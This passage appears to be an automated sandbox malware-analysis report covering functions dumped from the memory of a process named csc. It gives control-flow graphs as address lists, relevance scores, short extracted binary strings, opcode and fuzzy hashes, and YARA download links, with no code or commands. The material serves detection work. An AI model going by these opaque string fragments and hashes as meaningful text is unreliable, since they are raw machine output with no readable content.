                                                                                                                                              • String ID: 4']q$4']q$@r[$l`[$l`[
                                                                                                                                              • API String ID: 0-2887531262
                                                                                                                                              • Opcode ID: 327f5331f2ba298517800a78576bef68830909a882d7f7bbb6cd95698b3a5ec6
                                                                                                                                              • Instruction ID: efd595eae718d1939a82d80d29500ae6cdf3b4c1516848293d60f88b23952ca8
                                                                                                                                              • Opcode Fuzzy Hash: 327f5331f2ba298517800a78576bef68830909a882d7f7bbb6cd95698b3a5ec6
                                                                                                                                              • Instruction Fuzzy Hash: 8EC1C874A01218DFCB08DFA9D994AADB7B6FF89300F508158E506AB3A4DB71AC42CF51
                                                                                                                                              Function 0A5D5FF0 Relevance: 5.6, Strings: 4, Instructions: 576COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1270 a5d5ff0-a5d603e call a5d4648 1274 a5d653c-a5d6574 1270->1274 1275 a5d6044-a5d6059 call a5d4648 1270->1275 1292 a5d657b-a5d65b3 1274->1292 1275->1274 1281 a5d605f-a5d6063 1275->1281 1283 a5d607a-a5d608a 1281->1283 1284 a5d6065-a5d606f call a5d2548 1281->1284 1289 a5d608c-a5d608e 1283->1289 1290 a5d6091-a5d60af 1283->1290 1453 a5d6071 call a5d6a6f 1284->1453 1454 a5d6071 call a5d6a26 1284->1454 1455 a5d6071 call a5d6890 1284->1455 1456 a5d6071 call a5d68a0 1284->1456 1289->1290 1297 a5d60b5-a5d60cb call a5d4648 call a5d6df0 1290->1297 1298 a5d6240-a5d628d 1290->1298 1291 a5d6077 1291->1283 1313 a5d65ba-a5d65f4 1292->1313 1306 a5d620f-a5d6213 1297->1306 1307 a5d60d1-a5d60d5 1297->1307 1337 a5d663b-a5d6673 1298->1337 1338 a5d6293-a5d62b5 1298->1338 1308 a5d610d-a5d6156 call a5d1480 1306->1308 1309 a5d6219-a5d621d 1306->1309 1310 a5d60d7-a5d60e4 1307->1310 1311 a5d60e6 1307->1311 1329 a5d615c-a5d615e 1308->1329 1330 a5d6158-a5d615a 1308->1330 1314 a5d65fc-a5d6634 1309->1314 1315 a5d6223 1309->1315 1316 a5d60eb-a5d60ed 1310->1316 1311->1316 1313->1314 1314->1337 1315->1308 1316->1292 1320 a5d60f3-a5d60fd 1316->1320 1320->1292 1327 a5d6103-a5d6107 1320->1327 1327->1308 1327->1313 1332 a5d6165-a5d6167 1329->1332 1330->1329 1331 a5d6160 1330->1331 1331->1332 1335 a5d6169-a5d618e call a5d1480 call a5d1668 1332->1335 1336 a5d6193-a5d61b6 1332->1336 1335->1336 1342 a5d61b8-a5d61d8 1336->1342 1343 a5d61da-a5d61fd 1336->1343 1358 a5d667a-a5d66b2 1337->1358 1357 a5d62bb-a5d62ce 1338->1357 1338->1358 1342->1343 1350 a5d61ff-a5d6201 1343->1350 1351 a5d6228-a5d6230 call a5d7ab0 1343->1351 1350->1351 1355 a5d6203-a5d620c 1350->1355 1359 a5d6236-a5d623d 1351->1359 1364 a5d62f5-a5d62fb 1357->1364 1365 a5d62d0-a5d62d4 1357->1365 1373 a5d66b9-a5d66e5 1358->1373 1367 a5d66ed-a5d672a 1364->1367 1368 a5d6301 1364->1368 1369 a5d62e5 1365->1369 1370 a5d62d6-a5d62e3 1365->1370 1408 a5d6731-a5d6735 1367->1408 1372 a5d632e-a5d633f 1368->1372 1368->1373 1374 a5d6308-a5d6329 1368->1374 1375 a5d638a-a5d63f6 1368->1375 1376 a5d6407-a5d646f 1368->1376 1371 a5d62ea-a5d62ec 1369->1371 1370->1371 1371->1364 1378 a5d62ee 1371->1378 1380 a5d6341-a5d634e 1372->1380 1381 a5d6350 1372->1381 1373->1367 1397 a5d6492-a5d64a8 1374->1397 1418 a5d63f8 1375->1418 1419 a5d6404 1375->1419 1424 a5d647d 1376->1424 1425 a5d6471 1376->1425 1378->1364 1386 a5d6355-a5d6359 1380->1386 1381->1386 1389 a5d635b-a5d6367 1386->1389 1390 a5d6375 1386->1390 1389->1390 1399 a5d6369-a5d6373 1389->1399 1391 a5d637b-a5d6385 1390->1391 1391->1397 1407 a5d64ae 1397->1407 1397->1408 1399->1391 1412 a5d67d8-a5d682d 1407->1412 1413 a5d64b5-a5d64b9 1407->1413 1414 a5d67a7-a5d67d1 1407->1414 1415 a5d6737-a5d673b 1408->1415 1416 a5d6742-a5d676e 1408->1416 1420 a5d64bb-a5d64be call a5d0c18 1413->1420 1421 a5d64f5-a5d6539 1413->1421 1414->1412 1422 a5d673d 1415->1422 1423 a5d6776-a5d67a0 1415->1423 1416->1423 1418->1419 1419->1376 1432 a5d64c3-a5d64c9 1420->1432 1422->1412 1423->1414 1424->1397 1425->1424 1436 a5d64d8-a5d64dd 1432->1436 1437 a5d64cb-a5d64d6 1432->1437 1440 a5d64e8-a5d64f0 call a5d1438 1436->1440 1437->1440 1440->1421 1453->1291 1454->1291 1455->1291 1456->1291
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $Haq$Haq$Haq
                                                                                                                                              • API String ID: 0-432640594
                                                                                                                                              • Opcode ID: 693d41ee7c2d10857232fd04b1f7716968f1fe051d39db6089f6f210bd081d7f
                                                                                                                                              • Instruction ID: 56630481cb922660d1a3de98190fc0618a78922d6c6513f16246db4b79092aa0
                                                                                                                                              • Opcode Fuzzy Hash: 693d41ee7c2d10857232fd04b1f7716968f1fe051d39db6089f6f210bd081d7f
                                                                                                                                              • Instruction Fuzzy Hash: 0A328D30A10249CFCB64EF68D4546AEBBF2FF94310F108469E916AB3A1DF359D46CB91
                                                                                                                                              Function 09938060 Relevance: 5.4, Strings: 4, Instructions: 370COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1457 9938060-993809d 1459 99380bf-99380d5 call 9937e68 1457->1459 1460 993809f-99380a2 1457->1460 1466 993844b-993845f 1459->1466 1467 99380db-99380e7 1459->1467 1575 99380a4 call 99389d0 1460->1575 1576 99380a4 call 9938969 1460->1576 1577 99380a4 call 9938978 1460->1577 1462 99380aa-99380ac 1462->1459 1464 99380ae-99380b6 1462->1464 1464->1459 1476 993849f-99384a8 1466->1476 1468 9938218-993821f 1467->1468 1469 99380ed-99380f0 1467->1469 1470 9938225-993822e 1468->1470 1471 993834e-9938388 call 9937870 1468->1471 1473 99380f3-99380fc 1469->1473 1470->1471 1474 9938234-9938340 call 9937870 call 9937e00 call 9937870 1470->1474 1571 993838b call 993a758 1471->1571 1572 993838b call 993a748 1471->1572 1477 9938102-9938116 1473->1477 1478 9938540 1473->1478 1568 9938342 1474->1568 1569 993834b-993834c 1474->1569 1479 99384aa-99384b1 1476->1479 1480 993846d-9938476 1476->1480 1488 9938208-9938212 1477->1488 1489 993811c-99381b1 call 9937e68 * 2 call 9937870 call 9937e00 call 9937ea8 call 9937f50 call 9937fb8 1477->1489 1486 9938545-9938549 1478->1486 1483 99384b3-99384f6 call 9937870 1479->1483 1484 99384ff-9938506 1479->1484 1480->1478 1487 993847c-993848e 1480->1487 1483->1484 1490 993852b-993853e 1484->1490 1491 9938508-9938518 1484->1491 1494 9938554 1486->1494 1495 993854b 1486->1495 1500 9938490-9938495 1487->1500 1501 993849e 1487->1501 1488->1468 1488->1473 1547 99381b3-99381cb call 9937f50 call 9937870 call 9937b20 1489->1547 1548 99381d0-9938203 call 9937fb8 1489->1548 1490->1486 1491->1490 1507 993851a-9938522 1491->1507 1505 9938555 1494->1505 1495->1494 1573 9938498 call 993aee9 1500->1573 1574 9938498 call 993aef8 1500->1574 1501->1476 1505->1505 1507->1490 1515 9938391-9938442 call 9937870 1515->1466 1547->1548 1548->1488 1568->1569 1569->1471 1571->1515 1572->1515 1573->1501 1574->1501 1575->1462 1576->1462 1577->1462
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$4']q$l`[
                                                                                                                                              • API String ID: 0-428766390
                                                                                                                                              • Opcode ID: 1dcd415c19915c2a8c05ebd7645cbcbb01455eac01bb90a6beb8e22aaae3e181
                                                                                                                                              • Instruction ID: f17caf9997f36e189531c688156379abe08321680c600943337a542e71826835
                                                                                                                                              • Opcode Fuzzy Hash: 1dcd415c19915c2a8c05ebd7645cbcbb01455eac01bb90a6beb8e22aaae3e181
                                                                                                                                              • Instruction Fuzzy Hash: B8F1DB34B00218DFCB08EFA5D994A9DBBB6FF88301F518158E506AB3A5DB71EC46CB51
                                                                                                                                              Function 0A5D4240 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1578 a5d4240-a5d425f 1579 a5d4265-a5d4268 1578->1579 1580 a5d4312-a5d433a 1578->1580 1640 a5d426a call a5d422f 1579->1640 1641 a5d426a call a5d4448 1579->1641 1642 a5d426a call a5d4240 1579->1642 1581 a5d433c-a5d433e 1580->1581 1582 a5d4340-a5d4342 1580->1582 1581->1582 1584 a5d4344 1581->1584 1585 a5d4349-a5d434b 1582->1585 1583 a5d4270-a5d428c 1586 a5d428e 1583->1586 1587 a5d4294-a5d4296 1583->1587 1584->1585 1588 a5d434d-a5d4384 1585->1588 1589 a5d4386-a5d43aa 1585->1589 1590 a5d4298 1586->1590 1591 a5d4290-a5d4292 1586->1591 1592 a5d429d-a5d429f 1587->1592 1593 a5d43ab-a5d43ca 1588->1593 1589->1593 1590->1592 1591->1587 1591->1590 1594 a5d441e-a5d4474 1592->1594 1595 a5d42a5-a5d42ca 1592->1595 1602 a5d43cc-a5d43d4 1593->1602 1603 a5d43d6-a5d4400 1593->1603 1618 a5d4476-a5d44aa 1594->1618 1619 a5d44e3-a5d44ee 1594->1619 1596 a5d42cc-a5d42ce 1595->1596 1597 a5d42d0-a5d42d2 1595->1597 1596->1597 1599 a5d42d4 1596->1599 1600 a5d42d9-a5d42db 1597->1600 1599->1600 1604 a5d42dd-a5d42ff 1600->1604 1605 a5d4301 1600->1605 1610 a5d4407-a5d441b call a5d31e8 1602->1610 1603->1610 1607 a5d4303-a5d430d 1604->1607 1605->1607 1607->1610 1628 a5d44ac-a5d44b1 1618->1628 1629 a5d44b3-a5d44bc 1618->1629 1622 a5d44fc 1619->1622 1623 a5d44f0-a5d44fa 1619->1623 1624 a5d4501-a5d4503 1622->1624 1623->1624 1626 a5d451e-a5d453a 1624->1626 1627 a5d4505-a5d451d 1624->1627 1635 a5d4541-a5d455d 1626->1635 1630 a5d44d6-a5d44e2 1628->1630 1631 a5d44be-a5d44c1 1629->1631 1632 a5d44cb-a5d44d3 1629->1632 1631->1632 1632->1630 1638 a5d455f-a5d4571 1635->1638 1639 a5d457b-a5d458d 1635->1639 1638->1639 1640->1583 1641->1583 1642->1583
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4c]q$4c]q$4c]q$Haq
                                                                                                                                              • API String ID: 0-1741209197
                                                                                                                                              • Opcode ID: c12c9b52be104b413cdf7a1c822a29b2c6edce137e37561a8714bb910e58e644
                                                                                                                                              • Instruction ID: 12b9c6db33ae276b4609e8d93c5c6bdfaeb3edf6a7648c15546c58ae4508fabc
                                                                                                                                              • Opcode Fuzzy Hash: c12c9b52be104b413cdf7a1c822a29b2c6edce137e37561a8714bb910e58e644
                                                                                                                                              • Instruction Fuzzy Hash: CEB1E631A10205DFCF24CF68D8505ADB7B1FF89314F248669D90AAB3A1EB31ED46CB91
                                                                                                                                              Function 09939A40 Relevance: 5.2, Strings: 4, Instructions: 158COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1643 9939a40-9939a4c 1644 9939aa8-9939b0b 1643->1644 1645 9939a4e-9939a5e 1643->1645 1658 9939b87-9939bb8 call 9939bd1 1644->1658 1659 9939b0d-9939b30 call 99353d0 1644->1659 1648 9939a60-9939a6c 1645->1648 1649 9939a8f-9939aa7 1645->1649 1654 9939a85-9939a8e 1648->1654 1655 9939a6e-9939a84 1648->1655 1664 9939bbe-9939bc7 1658->1664 1659->1658 1663 9939b32-9939b84 1659->1663
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$,aq$HK[$|L[
                                                                                                                                              • API String ID: 0-77667497
                                                                                                                                              • Opcode ID: 9600797beb984e5ab089bb4d200316fd1593ea5db69ae62dcec20a3f84177439
                                                                                                                                              • Instruction ID: c9a2d974c5f3d52ebe4eabc7e34657f639f470c905376d6c9f751ffe9bc44a3b
                                                                                                                                              • Opcode Fuzzy Hash: 9600797beb984e5ab089bb4d200316fd1593ea5db69ae62dcec20a3f84177439
                                                                                                                                              • Instruction Fuzzy Hash: 5041D3327040596F8F019EAA9C509FF7FFEEF89210B14406AFA45D3251CA25CD1597A0
                                                                                                                                              Function 0A5D68A0 Relevance: 5.1, Strings: 4, Instructions: 137COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1668 a5d68a0-a5d68c4 1670 a5d68cd-a5d68d5 1668->1670 1671 a5d68c6-a5d68cb 1668->1671 1672 a5d68d8-a5d68dc 1670->1672 1671->1672 1673 a5d68ed 1672->1673 1674 a5d68de-a5d68eb 1672->1674 1676 a5d68f2-a5d68f4 1673->1676 1674->1676 1677 a5d68fa-a5d6955 1676->1677 1678 a5d6a30-a5d6a52 call a5d6d58 1676->1678 1692 a5d696d-a5d6971 1677->1692 1693 a5d6957-a5d695d 1677->1693 1686 a5d6a58-a5d6a5a 1678->1686 1687 a5d6a63-a5d6a6c 1686->1687 1696 a5d6977-a5d6987 1692->1696 1697 a5d6973-a5d6975 1692->1697 1694 a5d695f 1693->1694 1695 a5d6961-a5d6963 1693->1695 1694->1692 1695->1692 1701 a5d698d-a5d699d 1696->1701 1702 a5d6989-a5d698b 1696->1702 1698 a5d699f-a5d69a1 1697->1698 1698->1678 1699 a5d69a7-a5d69bb 1698->1699 1704 a5d69bd-a5d69cd 1699->1704 1705 a5d69cf-a5d69d4 1699->1705 1701->1698 1702->1698 1704->1705 1705->1678 1707 a5d69d6-a5d69f2 1705->1707 1707->1687
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3995432363.000000000A5D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A5D0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_a5d0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 0o@p$Dq@p$Lj@p$Lj@p
                                                                                                                                              • API String ID: 0-4286108749
                                                                                                                                              • Opcode ID: 6557b0c237cbae3b7c3a10b0587014807718334988fec2e6aa053c19f5153903
                                                                                                                                              • Instruction ID: f9ba2739dde39543a13adcb6f7bec52c6372eda6cf39194e8d614f6ad6022c69
                                                                                                                                              • Opcode Fuzzy Hash: 6557b0c237cbae3b7c3a10b0587014807718334988fec2e6aa053c19f5153903
                                                                                                                                              • Instruction Fuzzy Hash: 69415C35720110DFCB68DB69D8A4A6D77F2FF88620B1184A9E906EB771DB35EC06CB50
                                                                                                                                              Function 099374D2 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1763 99374d2-9937527 1782 9937529 call 9937642 1763->1782 1783 9937529 call 9937668 1763->1783 1768 993752f-993754a 1780 993754d call 9937c30 1768->1780 1781 993754d call 9937c20 1768->1781 1771 9937553-99375aa 1775 99375c2-9937635 1771->1775 1776 99375ac-99375b2 1771->1776 1777 99375b6-99375b8 1776->1777 1778 99375b4 1776->1778 1777->1775 1778->1775 1780->1771 1781->1771 1782->1768 1783->1768
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$x^[$x^[$x^[
                                                                                                                                              • API String ID: 0-451525180
                                                                                                                                              • Opcode ID: 3f7f72509771ffb2d0983fd64cdd49d88c33c4441befe4a27c8aa679dae6118e
                                                                                                                                              • Instruction ID: 0c24e0b455547a738f627bf9c37022b1c9b2e9a72d660480d13931cec5695848
                                                                                                                                              • Opcode Fuzzy Hash: 3f7f72509771ffb2d0983fd64cdd49d88c33c4441befe4a27c8aa679dae6118e
                                                                                                                                              • Instruction Fuzzy Hash: 5631AE327002049FCF49DFA4D85499ABBB6FF88310F1584A9F50AAB271DA31DC02CB91
                                                                                                                                              Function 0993B18A Relevance: 4.0, Strings: 3, Instructions: 277COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q$l`[
                                                                                                                                              • API String ID: 0-1508184152
                                                                                                                                              • Opcode ID: c0adc2be3ca548c08bff35561f1a72638266aeff77b0e3c38f92d0bbc4b65fea
                                                                                                                                              • Instruction ID: c8f08a7b49702100615d75ea54dace327c667f216eb426d8873cd172a0249bd7
                                                                                                                                              • Opcode Fuzzy Hash: c0adc2be3ca548c08bff35561f1a72638266aeff77b0e3c38f92d0bbc4b65fea
                                                                                                                                              • Instruction Fuzzy Hash: 86C1C974B01218DFCB08DFA5D994AADB7B6FF89300F508169E506AB3A4DB71AC42CF51
                                                                                                                                              Function 095C0078 Relevance: 3.1, Strings: 2, Instructions: 597COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994505916.00000000095C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q
                                                                                                                                              • API String ID: 0-3120983240
                                                                                                                                              • Opcode ID: a7769f13cc47d58201adf3d2736099788328ce02f30d4d38d9d3bbb60766ff24
                                                                                                                                              • Instruction ID: 408bdaf78190e8f6a5fbf20750f93c1014d8f9ae37376d5b6b6616fa8e64cb75
                                                                                                                                              • Opcode Fuzzy Hash: a7769f13cc47d58201adf3d2736099788328ce02f30d4d38d9d3bbb60766ff24
                                                                                                                                              • Instruction Fuzzy Hash: 070281B0B00315CF8EA56ABB586823B69DABBC5750F15052EE907D73C8DF64CC4587B2
                                                                                                                                              Function 09932CD0 Relevance: 3.0, Strings: 2, Instructions: 541COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (_]q$SY
                                                                                                                                              • API String ID: 0-3179355067
                                                                                                                                              • Opcode ID: ef8c592534ee51d3f95c9b69f06a20032ccd66a135714bf7ec4fd15dd9888b67
                                                                                                                                              • Instruction ID: 2d589b411da5ec4a1454390ce93a3163de50fefaf2d7b6cdbff2e21932e0489a
                                                                                                                                              • Opcode Fuzzy Hash: ef8c592534ee51d3f95c9b69f06a20032ccd66a135714bf7ec4fd15dd9888b67
                                                                                                                                              • Instruction Fuzzy Hash: 9F227B35B002149FDB44DFA9C891A6DB7F6FF88310F558569E905EB3A5CA71EC80CBA0
                                                                                                                                              Function 09932100 Relevance: 3.0, Strings: 2, Instructions: 516COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: $]q$$]q
                                                                                                                                              • API String ID: 0-127220927
                                                                                                                                              • Opcode ID: 5f81fe24e1ae8f4bf93a5b0560679a1536ac125f6a59186d63d522006bf314a8
                                                                                                                                              • Instruction ID: 6428a96e83b19f07355a1f52ce60e67b474fe120b7fca7d5d80c6d6fb3f9282a
                                                                                                                                              • Opcode Fuzzy Hash: 5f81fe24e1ae8f4bf93a5b0560679a1536ac125f6a59186d63d522006bf314a8
                                                                                                                                              • Instruction Fuzzy Hash: 55228D31F002198FCF15CFAAD855AADBBB5FF48700F548025E961AB394DB38A946CB91
                                                                                                                                              Function 095C0810 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994505916.00000000095C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 095C0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_95c0000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$4']q
                                                                                                                                              • API String ID: 0-3120983240
                                                                                                                                              • Opcode ID: eef2f8a2c0790a7394cdf2e516f9593f76e9bcbacb9b1735b9800644a8956196
                                                                                                                                              • Instruction ID: af234af9dae14e4befef573cf9dc60ce5fbbc5c9c3f7bce00c74188050385969
                                                                                                                                              • Opcode Fuzzy Hash: eef2f8a2c0790a7394cdf2e516f9593f76e9bcbacb9b1735b9800644a8956196
                                                                                                                                              • Instruction Fuzzy Hash: 6CC129B4B00206CF8F99ABB6946913EB6E7BBC5341B29442DE917D33C4EF348C069752
                                                                                                                                              Function 09938052 Relevance: 2.7, Strings: 2, Instructions: 224COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: 4']q$l`[
                                                                                                                                              • API String ID: 0-3387854408
                                                                                                                                              • Opcode ID: 3d79db0cf533291c62bf6628fdc87965c87e967e55ab69d83428ab1d56a6c9d5
                                                                                                                                              • Instruction ID: 60b98de08687291c437172e660a323319a119754e1315667cb9beabbcaca5b8a
                                                                                                                                              • Opcode Fuzzy Hash: 3d79db0cf533291c62bf6628fdc87965c87e967e55ab69d83428ab1d56a6c9d5
                                                                                                                                              • Instruction Fuzzy Hash: 4EA1ED34A10218DFCB08EFA5D894A9DBBB2FF88310F55C159E406AB365DB71EC46CB91
                                                                                                                                              Function 0993EA60 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: l`[$l`[
                                                                                                                                              • API String ID: 0-2812091460
                                                                                                                                              • Opcode ID: 8bae239a39b8a1e3f2879e6da788ab5110e4c69985e425fda889abdcd9aed4ef
                                                                                                                                              • Instruction ID: 9c32cc75e465509c50bd678ab56730e68d157113902dc516a7641738fcf43c91
                                                                                                                                              • Opcode Fuzzy Hash: 8bae239a39b8a1e3f2879e6da788ab5110e4c69985e425fda889abdcd9aed4ef
                                                                                                                                              • Instruction Fuzzy Hash: 5A812934B006089FCB15EFA9C454BADB7B6BF88304F54C569E4029B3A1DB76EC46CB90
                                                                                                                                              Function 09939BD1 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$Haq
                                                                                                                                              • API String ID: 0-3785302501
                                                                                                                                              • Opcode ID: 39f8a0ab9fb808a62576729099017656365c338c90d178664b503a41e521fe13
                                                                                                                                              • Instruction ID: 4e7f89653067bdb92b7a43f224094bd8c0a17ea0d41b03586e46fa80e6858b52
                                                                                                                                              • Opcode Fuzzy Hash: 39f8a0ab9fb808a62576729099017656365c338c90d178664b503a41e521fe13
                                                                                                                                              • Instruction Fuzzy Hash: 33610F303002858FCB699F39C8547AF7BE6AF81300F1585ADE496CB2A5DE74DD05CB91
                                                                                                                                              Function 099319C8 Relevance: 2.7, Strings: 2, Instructions: 182COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: (aq$Haq
                                                                                                                                              • API String ID: 0-3785302501
                                                                                                                                              • Opcode ID: 8ce84f6643bdcb34e7a62a07df7bc46742be3cfb4ddd206b549139bc4199b3df
                                                                                                                                              • Instruction ID: ef94621c4ec3e92f65e507640bd5b594a8794ce2c70aeabd234eb292f7995428
                                                                                                                                              • Opcode Fuzzy Hash: 8ce84f6643bdcb34e7a62a07df7bc46742be3cfb4ddd206b549139bc4199b3df
                                                                                                                                              • Instruction Fuzzy Hash: 0151BB307002048FCBA9AF78C850A6EBBF6EFC5300B6585ADD4469B3A4DE31DC06CB91
                                                                                                                                              Function 099389D0 Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.3994936847.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_9930000_csc.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: <5[$<5[
                                                                                                                                              • API String ID: 0-1769161577
                                                                                                                                              • Opcode ID: 88714bd843021ec4b104412e7624dd01abcab6a7afb0a51514f53ccb7f8da62f
                                                                                                                                              • Instruction ID: 816ed831357b718be3eee04dd749f65dcb980583632125ca35c98531182e03ff
                                                                                                                                              • Opcode Fuzzy Hash: 88714bd843021ec4b104412e7624dd01abcab6a7afb0a51514f53ccb7f8da62f
